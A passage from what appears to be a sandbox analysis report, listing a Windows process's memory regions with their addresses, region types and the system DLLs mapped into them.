"c:\\windows\\syswow64\\wldap32.dll") Region: id = 257 start_va = 0x762f0000 end_va = 0x76324fff entry_point = 0x762f0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 258 start_va = 0x76710000 end_va = 0x7686bfff entry_point = 0x76710000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 259 start_va = 0x76f40000 end_va = 0x76f4bfff entry_point = 0x76f40000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 260 start_va = 0x1a0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 261 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 262 start_va = 0x74410000 end_va = 0x7448ffff entry_point = 0x74410000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 263 start_va = 0xbd0000 end_va = 0xcaefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bd0000" filename = "" Region: id = 264 start_va = 0xe60000 end_va = 0xe9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 265 start_va = 0x743f0000 end_va = 0x74402fff entry_point = 0x743f0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 266 start_va = 0xa0000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 267 start_va = 0xea0000 end_va = 0xedffff entry_point = 0x0 region_type = private name = "private_0x0000000000ea0000" filename = "" Region: id = 268 start_va = 0xf20000 end_va = 0xf5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 269 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 270 start_va = 0xb0000 end_va = 0xb6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 271 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 272 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 273 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 274 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 275 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 276 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 277 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 278 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 279 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 280 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 281 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 282 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 283 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 284 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 285 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 286 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 287 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 288 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 289 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 290 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 291 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 292 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 293 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 294 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 295 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 296 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 297 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 298 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 299 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 300 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 301 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 302 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 303 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 304 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 305 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 306 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 307 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 308 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 309 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 310 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 311 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 312 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 313 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 314 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 315 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 316 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 317 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 318 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 319 start_va = 0x747a0000 end_va = 0x747b5fff entry_point = 0x747a0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 320 start_va = 0x230000 end_va = 0x26bfff entry_point = 0x230000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 321 start_va = 0x230000 end_va = 0x26bfff entry_point = 0x23128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 322 start_va = 0x230000 end_va = 0x26bfff entry_point = 0x23128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 323 start_va = 0x230000 end_va = 0x26bfff entry_point = 0x23128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 324 start_va = 0x230000 end_va = 0x26bfff entry_point = 0x23128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 325 start_va = 0x74760000 end_va = 0x7479afff entry_point = 0x7476128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 326 start_va = 0xd40000 end_va = 0xda7fff entry_point = 0x0 region_type = private name = "private_0x0000000000d40000" filename = "" Region: id = 327 start_va = 0x74f40000 end_va = 0x75b89fff entry_point = 0x74fc1601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 328 start_va = 0x76070000 end_va = 0x760c6fff entry_point = 0x76089ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 329 start_va = 0x76710000 end_va = 0x7686bfff entry_point = 0x7675ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 330 start_va = 0x760d0000 end_va = 0x761ecfff entry_point = 0x760d158a region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 331 start_va = 0x76f40000 end_va = 0x76f4bfff entry_point = 0x76f4238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 332 start_va = 0x749a0000 end_va = 0x749bbfff entry_point = 0x749aa431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 333 start_va = 0x75fd0000 end_va = 0x75fd5fff entry_point = 0x75fd1782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 334 start_va = 0x74990000 end_va = 0x74996fff entry_point = 0x7499128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 335 start_va = 0x762f0000 end_va = 0x76324fff entry_point = 0x762f145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 336 start_va = 0x23c0000 end_va = 0x257ffff entry_point = 0x0 region_type = private name = "private_0x00000000023c0000" filename = "" Region: id = 337 start_va = 0x74970000 end_va = 0x74981fff entry_point = 0x74971200 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 338 start_va = 0x74950000 end_va = 0x74960fff entry_point = 0x74951300 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 339 start_va = 0x74940000 end_va = 0x74948fff entry_point = 0x749415a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 340 start_va = 0x74920000 end_va = 0x74938fff entry_point = 0x74921319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 341 start_va = 0x74910000 end_va = 0x7491efff entry_point = 0x749112a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 342 start_va = 0x74900000 end_va = 0x7490cfff entry_point = 0x749012d0 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 343 start_va = 0x748e0000 end_va = 0x748f5fff entry_point = 0x748ea6aa region_type = mapped_file name = "dhcpsapi.dll" filename = "\\Windows\\SysWOW64\\dhcpsapi.dll" (normalized: "c:\\windows\\syswow64\\dhcpsapi.dll") Region: id = 344 start_va = 0x748d0000 end_va = 0x748defff entry_point = 0x748d125e region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 345 start_va = 0x748c0000 end_va = 0x748cafff entry_point = 0x748c61ff region_type = mapped_file name = "dsauth.dll" filename = "\\Windows\\SysWOW64\\dsauth.dll" (normalized: "c:\\windows\\syswow64\\dsauth.dll") Region: id = 346 start_va = 0x74880000 end_va = 0x748b3fff entry_point = 0x748812ce region_type = mapped_file name = "adsldpc.dll" filename = "\\Windows\\SysWOW64\\adsldpc.dll" (normalized: "c:\\windows\\syswow64\\adsldpc.dll") Region: id = 347 start_va = 0x76280000 end_va = 0x762c4fff entry_point = 0x762811e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 348 start_va = 0x74830000 end_va = 0x74873fff entry_point = 0x748463f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 349 start_va = 0x23c0000 end_va = 0x251ffff entry_point = 0x0 region_type = private name = "private_0x00000000023c0000" filename = "" Region: id = 350 start_va = 0x2540000 end_va = 0x257ffff entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 351 start_va = 0xa0000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 352 start_va = 0xb0000 end_va = 0xb6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 353 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 354 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 355 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 356 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 357 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 358 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 359 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 360 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 361 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 362 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 363 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 364 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 365 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 366 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 367 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 368 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 369 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 370 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 371 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 372 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 373 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 374 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 375 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 376 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 377 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 378 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 379 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 380 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 381 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 382 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 383 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 384 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 385 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 386 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 387 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 388 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 389 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 390 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 391 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 392 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 393 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 394 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 395 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 396 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 397 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 398 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 399 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 577 start_va = 0x23c0000 end_va = 0x24bffff entry_point = 0x0 region_type = private name = "private_0x00000000023c0000" filename = "" Region: id = 578 start_va = 0x24e0000 end_va = 0x251ffff entry_point = 0x0 region_type = private name = "private_0x00000000024e0000" filename = "" Region: id = 579 start_va = 0x2580000 end_va = 0x284efff entry_point = 0x2580000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 602 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 603 start_va = 0xcb0000 end_va = 0xceffff entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 604 start_va = 0xf70000 end_va = 0xfaffff entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 605 start_va = 0x2900000 end_va = 0x293ffff entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 606 start_va = 0x2960000 end_va = 0x299ffff entry_point = 0x0 region_type = private name = "private_0x0000000002960000" filename = "" Region: id = 607 start_va = 0x29c0000 end_va = 0x29fffff entry_point = 0x0 region_type = private name = "private_0x00000000029c0000" filename = "" Region: id = 608 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 609 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 610 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 657 start_va = 0x2870000 end_va = 0x28affff entry_point = 0x0 region_type = private name = "private_0x0000000002870000" filename = "" Region: id = 658 start_va = 0x28b0000 end_va = 0x28effff entry_point = 0x0 region_type = private name = "private_0x00000000028b0000" filename = "" Region: id = 659 start_va = 0x2a80000 end_va = 0x2abffff entry_point = 0x0 region_type = private name = "private_0x0000000002a80000" filename = "" Region: id = 660 start_va = 0x2ad0000 end_va = 0x2b0ffff entry_point = 0x0 region_type = private name = "private_0x0000000002ad0000" filename = "" Region: id = 661 start_va = 0x7efa4000 end_va = 0x7efa6fff entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 662 start_va = 0x7efa7000 end_va = 0x7efa9fff entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 663 start_va = 0x74800000 end_va = 0x7480afff entry_point = 0x74800000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 726 start_va = 0x747d0000 end_va = 0x747e1fff entry_point = 0x747d0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 833 start_va = 0x2b40000 end_va = 0x2b7ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b40000" filename = "" Region: id = 834 start_va = 0x2b90000 end_va = 0x2bcffff entry_point = 0x0 region_type = private name = "private_0x0000000002b90000" filename = "" Region: id = 835 start_va = 0x746f0000 end_va = 0x7472bfff entry_point = 0x746f0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 836 start_va = 0x7efa1000 end_va = 0x7efa3fff entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 838 start_va = 0xdb0000 end_va = 0xe5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 839 start_va = 0x747c0000 end_va = 0x747c4fff entry_point = 0x747c0000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 841 start_va = 0x230000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 842 start_va = 0xde0000 end_va = 0xe1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000de0000" filename = "" Region: id = 843 start_va = 0xe20000 end_va = 0xe5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e20000" filename = "" Region: id = 844 start_va = 0xee0000 end_va = 0xf1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 845 start_va = 0x2a60000 end_va = 0x2a9ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a60000" filename = "" Region: id = 846 start_va = 0x2bf0000 end_va = 0x2c2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002bf0000" filename = "" Region: id = 847 start_va = 0x2c40000 end_va = 0x2c7ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c40000" filename = "" Region: id = 848 start_va = 0x2c80000 end_va = 0x3072fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c80000" filename = "" Region: id = 849 start_va = 0x74820000 end_va = 0x74827fff entry_point = 0x74820000 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\SysWOW64\\drprov.dll" (normalized: "c:\\windows\\syswow64\\drprov.dll") Region: id = 850 start_va = 0x7ef9e000 end_va = 0x7efa0fff entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 851 start_va = 0x7efa4000 end_va = 0x7efa6fff entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 852 start_va = 0x74730000 end_va = 0x74758fff entry_point = 0x74730000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 853 start_va = 0x2ad0000 end_va = 0x2b0ffff entry_point = 0x0 region_type = private name = "private_0x0000000002ad0000" 